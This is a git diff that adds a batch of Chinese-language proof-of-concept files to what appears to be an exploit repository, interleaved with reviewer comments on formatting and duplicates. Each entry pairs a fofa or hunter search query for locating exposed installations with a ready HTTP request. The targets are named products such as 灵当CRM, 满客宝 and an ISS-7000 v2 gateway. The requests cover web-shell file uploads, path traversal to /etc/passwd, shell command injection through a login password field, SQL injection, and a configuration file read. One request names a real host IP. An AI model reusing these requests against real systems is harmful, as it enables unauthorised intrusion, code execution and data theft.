diff --git a/湖南建研工程质量检测系统FileUpload存在任意文件上传漏洞.md b/湖南建研工程质量检测系统FileUpload存在任意文件上传漏洞.md new file mode 100644 index 0000000..8d05112 --- /dev/null +++ b/湖南建研工程质量检测系统FileUpload存在任意文件上传漏洞.md @@ -0,0 +1,50 @@ +# 湖南建研工程质量检测系统FileUpload存在任意文件上传漏洞 + +# 一、漏洞简介 +湖南建研质量监测系统由相关政府质量监督机构、参建单位等共同参与,根据各自的职责,上网操作相应的模块,实现工程质量监督业务的统一管理。该系统存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 湖南建研工程质量检测系统 + +# 三、资产测绘 ++ hunter`web.body="/Content/Theme/Standard/webSite/login.css"` ++ 特征 + +![1702346060563-9e664378-c6d3-46b6-84b3-8d0043c714cd.png](./img/IwfdowcgtbTh-STO/1702346060563-9e664378-c6d3-46b6-84b3-8d0043c714cd-785769.png) + +# 四、漏洞复现 +```plain +POST /Platform/System/FileUpload.ashx HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Connection: close +Content-Length: 336 +Accept-Encoding: gzip +Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l + +------YsOxWxSvj1KyZow1PTsh98fdu6l +Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu63.asp" +Content-Type: image/png + +123 +------YsOxWxSvj1KyZow1PTsh98fdu6l +Content-Disposition: form-data; name="target" + +/Applications/SkillDevelopAndEHS/ +------YsOxWxSvj1KyZow1PTsh98fdu6l-- +``` + +![1703507070360-9784a7d0-7511-4b04-81d2-07f780b073f8.png](./img/IwfdowcgtbTh-STO/1703507070360-9784a7d0-7511-4b04-81d2-07f780b073f8-646404.png) + +上传文件位置 + +```plain +/Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu63.asp +``` + +![1703507089398-37c89680-29c6-44ae-8fcf-a39b42416248.png](./img/IwfdowcgtbTh-STO/1703507089398-37c89680-29c6-44ae-8fcf-a39b42416248-473006.png) + + + +> 更新: 2024-02-29 23:55:43 +> 原文: \ No newline at end of file diff --git a/湖南建研工程质量检测系统updatefile存在任意文件上传漏洞.md b/湖南建研工程质量检测系统updatefile存在任意文件上传漏洞.md new file mode 100644 index 0000000..d1b97ed --- /dev/null +++ b/湖南建研工程质量检测系统updatefile存在任意文件上传漏洞.md 
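Review bot: This entry uses `Host: {hostname}` while the Attachment entry above leaves `Host:` blank and the Crocus entries also leave it blank; adopt one placeholder convention across the commit. The fences are ```plain for HTTP, inconsistent with ```http elsewhere. The request shows `Content-Type: image/png` on a `.asp` filename, which is the actual validation gap (server trusts the declared MIME type, not the extension); stating that in 漏洞简介 would tell operators what to fix or what to filter at the WAF. `原文:` is empty and 影响版本 has no version.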
@@ -0,0 +1,43 @@ +# 湖南建研工程质量检测系统updatefile存在任意文件上传漏洞 + +# 一、漏洞简介 +湖南建研质量监测系统由相关政府质量监督机构、参建单位等共同参与,根据各自的职责,上网操作相应的模块,实现工程质量监督业务的统一管理。该系统存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 湖南建研工程质量检测系统 + +# 三、资产测绘 ++ hunter`web.body="/Content/Theme/Standard/webSite/login.css"` ++ 特征 + +![1702346060563-9e664378-c6d3-46b6-84b3-8d0043c714cd.png](./img/pyW4NN9yooREmsku/1702346060563-9e664378-c6d3-46b6-84b3-8d0043c714cd-565576.png) + +# 四、漏洞复现 +```plain +POST /Scripts/admintool?type=updatefile HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0 +Content-Length: 90 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate + +filePath=enelxghy.aspx&fileContent=<%@ Page Language="C#"%><% Response.Write(1234*1234);%> +``` + +![1702348378974-0d318381-620c-41aa-b97a-1b4f19878845.png](./img/pyW4NN9yooREmsku/1702348378974-0d318381-620c-41aa-b97a-1b4f19878845-910772.png) + +上传文件位置 + +```plain +/Scripts/enelxghy.aspx +``` + +![1702348240471-b1fcadb7-dc80-40f8-8d01-7537daaeabb5.png](./img/pyW4NN9yooREmsku/1702348240471-b1fcadb7-dc80-40f8-8d01-7537daaeabb5-361653.png) + + + +> 更新: 2024-02-29 23:55:43 +> 原文: \ No newline at end of file diff --git a/满客宝后台管理系统downloadWebFile任意文件读取漏洞.md b/满客宝后台管理系统downloadWebFile任意文件读取漏洞.md new file mode 100644 index 0000000..fb7d73b --- /dev/null +++ b/满客宝后台管理系统downloadWebFile任意文件读取漏洞.md 
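Review bot: Duplicate of 湖南建研-检测系统-admintool-任意文件上传.md earlier in this commit (same `POST /Scripts/admintool?type=updatefile`, same `filePath`/`fileContent` parameters); keep this fuller version and delete the other, or cross-reference them. The 漏洞简介 is copied verbatim from the other two 湖南建研 entries and does not mention `admintool` or `updatefile`, so a reader searching by component gets no help; the written file lands directly under `/Scripts/`, a web-served directory, which is the point a fix description should make. `Host: {hostname}` vs blank `Host:` inconsistency and empty `原文:` as noted on the sibling entries.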
@@ -0,0 +1,28 @@ +# 满客宝后台管理系统downloadWebFile任意文件读取漏洞 + +# 一、漏洞简介 +满客宝后台管理系统downloadWebFile任意文件读取漏洞 + +# 二、影响版本 ++ 满客宝智慧食堂 + +# 三、资产测绘 ++ fofa`body="满客宝后台管理系统"` ++ 特征 + +![1722532363550-337cb4d1-c45a-4dcf-a328-7b077525c2ef.png](./img/aKSqtnroQS-WMtFo/1722532363550-337cb4d1-c45a-4dcf-a328-7b077525c2ef-922609.png) + +# 四、漏洞复现 +```java +GET /base/api/v1/kitchenVideo/downloadWebFile.swagger?fileName=&ossKey=/../../../../../../../../../../../etc/passwd HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 +Connection: close +``` + +![1722532515012-fbfcea9f-a5f9-4633-a9ce-f598bf620cec.png](./img/aKSqtnroQS-WMtFo/1722532515012-fbfcea9f-a5f9-4633-a9ce-f598bf620cec-890321.png) + + + +> 更新: 2024-08-12 17:15:58 +> 原文: \ No newline at end of file diff --git a/满客宝智慧食堂预定系统selectUserByOrgId存在未授权访问漏洞.md b/满客宝智慧食堂预定系统selectUserByOrgId存在未授权访问漏洞.md new file mode 100644 index 0000000..ca9f46d --- /dev/null +++ b/满客宝智慧食堂预定系统selectUserByOrgId存在未授权访问漏洞.md @@ -0,0 +1,28 @@ +# 满客宝智慧食堂预定系统selectUserByOrgId 存在未授权访问漏洞 + +# 一、漏洞简介 +满客宝智慧食堂预定系统selectUserByOrgId 存在未授权访问漏洞 + +# 二、影响版本 ++ 满客宝智慧食堂预定系统 + +# 三、资产测绘 ++ fofa`icon_hash="-409875651" ` ++ 特征 + +![1722533721568-8ccae965-cf23-41b8-9b0f-087e222a1df4.png](./img/S161PTrhLGIcPwyy/1722533721568-8ccae965-cf23-41b8-9b0f-087e222a1df4-867868.png) + +# 四、漏洞复现 +```java +GET /yuding/selectUserByOrgId.action?record= HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 +Connection: close +``` + +![1722533694097-958173f0-a710-4928-98ef-cf3474338592.png](./img/S161PTrhLGIcPwyy/1722533694097-958173f0-a710-4928-98ef-cf3474338592-016901.png) + + + +> 更新: 2024-08-12 17:15:57 +> 原文: \ No newline at end of file diff --git a/瀚霖科技股份有限公司ISS-7000v2网关login_handler.cgi存在命令执行漏洞.md b/瀚霖科技股份有限公司ISS-7000v2网关login_handler.cgi存在命令执行漏洞.md new file mode 100644 index 0000000..1fb1b4a 
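Review bot: In both 满客宝 entries the 一、漏洞简介 paragraph merely repeats the title, so the section adds nothing; describe the product and what the endpoint exposes (an `ossKey` traversal reading `/etc/passwd` in the first, an unauthenticated `selectUserByOrgId.action` user listing in the second). The fofa query in the second entry has a trailing space inside the quotes (`icon_hash="-409875651" `), which will be copied into searches verbatim. Both use ```java fences for HTTP requests and leave `原文:` empty; 影响版本 lists two different product names (`满客宝智慧食堂` vs `满客宝智慧食堂预定系统`) for what appears to be the same platform, so confirm which is correct.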
--- /dev/null +++ b/瀚霖科技股份有限公司ISS-7000v2网关login_handler.cgi存在命令执行漏洞.md @@ -0,0 +1,31 @@ +# 瀚霖科技股份有限公司ISS-7000 v2网关login_handler.cgi存在命令执行漏洞 + +# 一、漏洞简介 + ISS-7000 v2网络网关服务器是台高性能的网关,提供各类酒店网络认证计费的完整解决方案。由于智慧手机与平板电脑日渐普及,人们工作之时开始使用随身携带的设备,因此无线网络也成为网络使用者基本服务的项目。ISS-7000 v2可登录300至1000终端设备同时上网,并发量是一般设备的好几倍。为了提供安全上网服务,本公司专利技术所设计的动态使用者帐户生成器,能避免非使用者侵入酒店内部网络。 + +# 二、影响版本 +1.00.06 和1.00.08 + +# 三、资产测绘 + - fofa `body="css/login_form_style-06.css"` ++ 特征 + +![1731053389608-53172b55-f85a-4160-90a1-a46437c9e921.png](./img/2eQP4LJ8jemsjq4j/1731053389608-53172b55-f85a-4160-90a1-a46437c9e921-708438.png) + +# 四 、漏洞复现 +```java +POST /login_handler.cgi HTTP/1.1 +Host: +Content-Length: 79 +Content-Type: application/x-www-form-urlencoded +Connection: close + +username=admin&password=admin;id;&uilng=3&button=%E7%99%BB%E5%85%A5&Signin= +``` + +![1731053435815-51591c43-d512-4214-a447-edfb19d54653.png](./img/2eQP4LJ8jemsjq4j/1731053435815-51591c43-d512-4214-a447-edfb19d54653-365176.png) + + + +> 更新: 2024-11-27 10:04:11 +> 原文: \ No newline at end of file diff --git a/灵当CRM系统接口getMyAmbassador存在SQL注入漏洞.md b/灵当CRM系统接口getMyAmbassador存在SQL注入漏洞.md new file mode 100644 index 0000000..29f1ce6 --- /dev/null +++ b/灵当CRM系统接口getMyAmbassador存在SQL注入漏洞.md 
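Review bot: This is the only entry in the commit that records concrete affected versions (`1.00.06 和1.00.08`), which is the right model for the others; it still leaves `原文:` empty, so the source of that version claim cannot be checked. Formatting slips: the 漏洞简介 paragraph starts with a leading space, 三、资产测绘 mixes a `-` bullet with the `+` bullets used everywhere else, and the heading `# 四 、漏洞复现` has a stray space before the comma. The payload shows shell metacharacters passed through the `password` field of `login_handler.cgi`, so the fix statement should name input sanitisation in that CGI and a detection hint (`;` or other shell syntax in login form fields) would help gateway operators who cannot patch immediately.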
@@ -0,0 +1,25 @@ +# 灵当CRM系统接口getMyAmbassador存在SQL注入漏洞 + +灵当CRM系统接口getMyAmbassador存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```javascript +body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js") +``` + +## poc + +```javascript +POST /crm/WeiXinApp/marketing/index.php?module=Ambassador&action=getMyAmbassador HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Content-Type: application/x-www-form-urlencoded +Connection: close + +logincrm_userid=-1 union select user(),2,3# +``` + +![image-20241227212430930](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272124007.png) \ No newline at end of file diff --git a/灵当CRM系统接口getOrderList存在SQL注入漏洞.md b/灵当CRM系统接口getOrderList存在SQL注入漏洞.md new file mode 100644 index 0000000..2b007bc --- /dev/null +++ b/灵当CRM系统接口getOrderList存在SQL注入漏洞.md @@ -0,0 +1,23 @@ +# 灵当CRM系统接口getOrderList存在SQL注入漏洞 + +灵当CRM系统接口getOrderList存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```javascript +body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js") +``` + +## poc + +```javascript +GET /crm/WeiXinApp/marketing/index.php?module=WxOrder&action=getOrderList&crm_user_id=1%20AND%20(SELECT%209552%20FROM%20(SELECT(SLEEP(5)))x) HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +``` + +![image-20240919111854302](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409191119991.png) \ No newline at end of file 
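Review bot: The getOrderList entry here duplicates 灵当crmgetOrderList存在SQL注入漏洞.md later in this commit (same `module=WxOrder&action=getOrderList&crm_user_id=` time-based payload); consolidate. Both files fence the fofa query and the HTTP request as ```javascript, which they are not, and both omit the 漏洞简介/影响版本/更新/原文 template the other 灵当 entries use, so the repository now has two layouts for one product. The getMyAmbassador request ends with `Connection: close` and then a body but no `Content-Length`; if the capture was abridged, say so rather than presenting it as a complete request.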
diff --git a/灵当CRM系统接口multipleUpload.php文件上传漏洞.md b/灵当CRM系统接口multipleUpload.php文件上传漏洞.md new file mode 100644 index 0000000..38f0aa5 --- /dev/null +++ b/灵当CRM系统接口multipleUpload.php文件上传漏洞.md @@ -0,0 +1,29 @@ +# 灵当CRM系统接口multipleUpload.php文件上传漏洞 + +灵当CRM系统接口multipleUpload.php文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。 + +## fofa + +```javascript +body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js") +``` + +## poc + +```javascript +POST /crm/modules/Home/multipleUpload.php?myatt_id=1&myatt_moduel=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR + +------WebKitFormBoundaryj7OlOPiiukkdktZR +Content-Disposition: form-data; name="file"; filename="1.php" +Content-Type: image/png + + +------WebKitFormBoundaryj7OlOPiiukkdktZR-- +``` + +![image-20240923093829498](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409230938562.png) + +文件路径`/crm/storage/2024/September/week2/1.php` \ No newline at end of file diff --git a/灵当CRM系统接口pdf.php接口处存在任意文件读取漏洞.md b/灵当CRM系统接口pdf.php接口处存在任意文件读取漏洞.md new file mode 100644 index 0000000..946b166 --- /dev/null +++ b/灵当CRM系统接口pdf.php接口处存在任意文件读取漏洞.md 
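Review bot: This multipleUpload.php entry duplicates 灵当crmmultipleUpload存在任意文件上传漏洞.md later in the commit (same `/crm/modules/Home/multipleUpload.php`, same `myatt_id`/`myatt_moduel` parameters, same `/crm/storage/...` destination), with a different query string (`myatt_id=1&myatt_moduel=1` vs `uploadtype=uploadimg`); merge them and note both parameter forms in one place. The multipart body is empty between the `Content-Type: image/png` header and the closing boundary and no `Content-Length` is given, so the record is incomplete; the mismatch between declared `image/png` and a `.php` filename is the validation gap worth stating in the description. ```javascript fences again wrap fofa and HTTP text.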
@@ -0,0 +1,24 @@ +# 灵当CRM系统接口pdf.php接口处存在任意文件读取漏洞 + +灵当CRM系统接口pdf.php接口处存在任意文件读取漏洞,允许攻击者通过恶意读取系统配置文件,获取敏感信息。 + +## fofa + +```javascript +body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js") +``` + +## poc + +```javascript +GET /crm/data/pdf.php?url=../config.inc.php HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Connection: Keep-Alive +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410181607841.webp) \ No newline at end of file diff --git a/灵当CRM系统接口uploadfile文件上传漏洞.md b/灵当CRM系统接口uploadfile文件上传漏洞.md new file mode 100644 index 0000000..c88ac2a --- /dev/null +++ b/灵当CRM系统接口uploadfile文件上传漏洞.md @@ -0,0 +1,32 @@ +# 灵当CRM系统接口uploadfile文件上传漏洞 + +灵当CRM系统接口uploadfile文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。 + +## fofa + +```javascript +body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js") +``` + +## poc + +```javascript +POST /crm/weixinmp/index.php?userid=123&module=Upload&usid=1&action=uploadfile HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Content-Type: application/x-www-form-urlencoded +Connection: close + +file_info={"name":"1.php"}& +``` + +![image-20241227212839673](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272128744.png) + +文件路径 + +``` +/crm/storage/2024/December/week4/回显文件名.php +``` + 
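Review bot: Both hunks duplicate later entries (灵当crmpdf存在任意文件读取漏洞.md and 灵当crmuploadfile存在文件写入漏洞.md) with the same endpoints and parameters; pick one copy of each. The pdf.php entry uses `Host: xx.xx.xx.xx` while every other 灵当 entry leaves `Host:` blank. In the uploadfile entry the body `file_info={"name":"1.php"}&` follows `Connection: close` with no `Content-Length`, and the 文件路径 block says `回显文件名.php` without explaining that the server renames the file (the sibling entry shows a numeric name), so state that the stored name is taken from the response. The title "pdf.php接口处存在" repeats 接口 twice; ```javascript fences persist.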
diff --git a/灵当CRM系统接口wechatSession文件上传漏洞.md b/灵当CRM系统接口wechatSession文件上传漏洞.md new file mode 100644 index 0000000..ded2584 --- /dev/null +++ b/灵当CRM系统接口wechatSession文件上传漏洞.md @@ -0,0 +1,32 @@ +# 灵当CRM系统接口wechatSession文件上传漏洞 + +灵当CRM系统接口wechatSession文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。 + +## fofa + +```javascript +body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js") +``` + +## poc + +```javascript +POST /crm/wechatSession/index.php?token=9b06a9617174f1085ddcfb4ccdb6837f&msgid=1&operation=upload HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Connection: keep-alive +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary03rNBzFMIytvpWhy + +------WebKitFormBoundary03rNBzFMIytvpWhy +Content-Disposition: form-data; name="file"; filename="2.php" +Content-Type: image/jpeg + + +------WebKitFormBoundary03rNBzFMIytvpWhy-- +``` + +![image-20241018155224218](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410181552292.png) + +文件路径`/crm/storage/wechatsession/2024/10/14/2.php` \ No newline at end of file diff --git a/灵当crmauth-info存在信息泄露漏洞.md b/灵当crmauth-info存在信息泄露漏洞.md new file mode 100644 index 0000000..677c511 --- /dev/null +++ b/灵当crmauth-info存在信息泄露漏洞.md 
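Review bot: Duplicate of 灵当crmwechatSession存在任意文件上传漏洞.md later in this commit (identical `token=9b06a9617174f1085ddcfb4ccdb6837f&msgid=1&operation=upload`). The entry never says what that `token` value is: if it is a constant shipped in the product the vulnerability is really a hard-coded token and that should be the headline (and a reliable detection signature); if it is a per-install or per-session value it must be labelled as such and redacted. The multipart body is empty and there is no `Content-Length`, so the capture is abridged; mark it so. ```javascript fences on fofa/HTTP text as elsewhere in the 灵当CRM系统接口 files.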
@@ -0,0 +1,31 @@ +# 灵当crm auth-info 存在信息泄露漏洞 + +# 一、漏洞简介 +灵当CRM(Customer Relationship Management,客户关系管理)是一款面向中小企业的客户关系管理软件,旨在帮助企业更好地管理客户信息、销售流程、市场营销和服务支持等方面的工作。灵当CRM提供了一系列工具和功能,帮助企业在销售、市场和服务部门之间实现高效协作,提高客户满意度和业务效率。灵当CRM客户管理系统auth-info 存在信息泄露漏洞。 + +# 二、影响版本 ++ 灵当crm + +# 三、资产测绘 ++ fofa`body="[http://localhost:8088/crm/index.php"](http://localhost:8088/crm/index.php") && body="ldcrm.base.js"` `body="crmcommon/js/jquery/jquery-1.10.1.min.js"` ++ 特征 + +![1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a.png](./img/cG69q8kjl5ea6aqq/1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a-284399.png) + +# 四、漏洞复现 +```java +POST /crm/dataCache/weixin/auth_info.txt HTTP/1.1 +Host: +Content-Length: 779 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0Mh3BfgWszxRFokh +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 +``` + +![1726734061269-8f9d8451-18ae-477b-b392-9d4db0f4ecc5.png](./img/cG69q8kjl5ea6aqq/1726734061269-8f9d8451-18ae-477b-b392-9d4db0f4ecc5-484618.png) + + + + + +> 更新: 2024-10-21 11:49:37 +> 原文: \ No newline at end of file diff --git a/灵当crmgetOrderList存在SQL注入漏洞.md b/灵当crmgetOrderList存在SQL注入漏洞.md new file mode 100644 index 0000000..3e12c11 --- /dev/null +++ b/灵当crmgetOrderList存在SQL注入漏洞.md 
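Review bot: The fofa line has been mangled by markdown auto-linking: `body="[http://localhost:8088/crm/index.php"](http://localhost:8088/crm/index.php") && body="ldcrm.base.js"` is no longer a valid query; put the whole expression in a single backtick span so the quotes survive. The request is a `POST` to a static `auth_info.txt` with `Content-Length: 779` and a multipart `Content-Type` but no body and no explanation of why a POST is needed to read a cache file; either a plain GET is meant or the entry should say what the server requires. The 漏洞简介 does not say what `auth_info.txt` contains (WeChat app credentials, by the path), which is what a defender needs to decide whether to rotate secrets. `原文:` is empty.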
@@ -0,0 +1,45 @@ +# 灵当crm getOrderList存在SQL注入漏洞 + +# 一、漏洞简介 +灵当CRM(Customer Relationship Management,客户关系管理)是一款面向中小企业的客户关系管理软件,旨在帮助企业更好地管理客户信息、销售流程、市场营销和服务支持等方面的工作。灵当CRM提供了一系列工具和功能,帮助企业在销售、市场和服务部门之间实现高效协作,提高客户满意度和业务效率。灵当CRM客户管理系getOrderList存在SQL注入漏洞。 + +# 二、影响版本 ++ 灵当crm + +# 三、资产测绘 ++ fofa`body="[http://localhost:8088/crm/index.php"](http://localhost:8088/crm/index.php") && body="ldcrm.base.js"` `body="crmcommon/js/jquery/jquery-1.10.1.min.js"` ++ 特征 + +![1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a.png](./img/HIaLS568Ua4tqtpX/1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a-553408.png) + +# 四、漏洞复现 +```java +GET /crm/WeiXinApp/marketing/index.php?module=WxOrder&action=getOrderList&crm_user_id=11%20AND%20(SELECT%209552%20FROM%20(SELECT(SLEEP(1)))fiAG) HTTP/1.1 +Host: 120.79.185.144:85 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Ldwk: bG91ZG9uZ3dlbmt1 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +``` + +![1726734714363-2bcde573-1379-4233-b74e-f18ee0a65373.png](./img/HIaLS568Ua4tqtpX/1726734714363-2bcde573-1379-4233-b74e-f18ee0a65373-855630.png) + +```java +GET /crm/WeiXinApp/marketing/index.php?module=WxOrder&action=getOrderList&crm_user_id=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Ldwk: bG91ZG9uZ3dlbmt1 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +``` + +![1726734781470-32269f52-de00-4e64-b137-09ff307ffdb3.png](./img/HIaLS568Ua4tqtpX/1726734781470-32269f52-de00-4e64-b137-09ff307ffdb3-547283.png) + + + +> 更新: 2024-10-21 11:49:38 +> 原文: \ No newline at end of file 
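Review bot: The first request carries a real address, `Host: 120.79.185.144:85`, whereas every other request in this commit blanks `Host:`; redact it, as publishing a specific third-party host in a PoC repository is a disclosure problem in itself. The `Accept-Ldwk: bG91ZG9uZ3dlbmt1` header is a tool/author marker, not part of the finding, and should be removed from the record. This file duplicates 灵当CRM系统接口getOrderList存在SQL注入漏洞.md earlier in the commit; the 漏洞简介 has a typo ("客户管理系getOrderList" is missing 统), the fofa query is mangled by auto-linking as in the auth-info entry, and the second request block has no caption saying it is the benign baseline used to compare response times.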
diff --git a/灵当crmmultipleUpload存在任意文件上传漏洞.md b/灵当crmmultipleUpload存在任意文件上传漏洞.md new file mode 100644 index 0000000..975dc1d --- /dev/null +++ b/灵当crmmultipleUpload存在任意文件上传漏洞.md @@ -0,0 +1,48 @@ +# 灵当crm multipleUpload存在任意文件上传漏洞 + +# 一、漏洞简介 +灵当CRM(Customer Relationship Management,客户关系管理)是一款面向中小企业的客户关系管理软件,旨在帮助企业更好地管理客户信息、销售流程、市场营销和服务支持等方面的工作。灵当CRM提供了一系列工具和功能,帮助企业在销售、市场和服务部门之间实现高效协作,提高客户满意度和业务效率。灵当crm multipleUpload.php处存在任意文件上传漏洞。 + +# 二、影响版本 ++ 灵当crm + +# 三、资产测绘 ++ fofa`body="[http://localhost:8088/crm/index.php"](http://localhost:8088/crm/index.php") && body="ldcrm.base.js"` ++ 特征 + +![1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a.png](./img/n_rB39my7VHUQaTD/1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a-180620.png) + +# 四、漏洞复现 +```java +POST /crm/modules/Home/multipleUpload.php?uploadtype=uploadimg HTTP/1.1 +Host: +Content-Length: 779 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0Mh3BfgWszxRFokh +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 + +------WebKitFormBoundary0Mh3BfgWszxRFokh +Content-Disposition: form-data; name="file"; filename="budong.php" +Content-Type: text/plain + + +------WebKitFormBoundary0Mh3BfgWszxRFokh +Content-Disposition: form-data; name="error" + +UPLOAD_ERR_OK +------WebKitFormBoundary0Mh3BfgWszxRFokh-- +``` + +![1726733803836-2941958f-c112-40e2-a412-85a7277323f6.png](./img/n_rB39my7VHUQaTD/1726733803836-2941958f-c112-40e2-a412-85a7277323f6-953406.png) + +上传路径 + +```java +crm/storage/2024/September/week3/budong.php +``` + +![1726733845670-f34ac442-40c8-4647-af5c-c0cab59d4d83.png](./img/n_rB39my7VHUQaTD/1726733845670-f34ac442-40c8-4647-af5c-c0cab59d4d83-617707.png) + + + +> 更新: 2024-10-21 11:49:37 +> 原文: \ No newline at end of file diff --git a/灵当crmpdf存在任意文件读取漏洞.md b/灵当crmpdf存在任意文件读取漏洞.md new file mode 100644 index 0000000..8743d48 --- /dev/null +++ b/灵当crmpdf存在任意文件读取漏洞.md 
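Review bot: Duplicate of 灵当CRM系统接口multipleUpload.php文件上传漏洞.md earlier in the commit; keep one. The multipart body declares `Content-Length: 779` but the visible body is far shorter and the file part is empty, so label the capture as abridged. The 上传路径 value `crm/storage/2024/September/week3/budong.php` lacks the leading `/` every other path in this commit has, and the fofa query is again auto-linked into `body="[http://localhost:8088/crm/index.php"](...)`. For the description, the fact that the upload is stored under a date-derived path inside the web root is the point a fix (store outside web root, whitelist extensions) should address.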
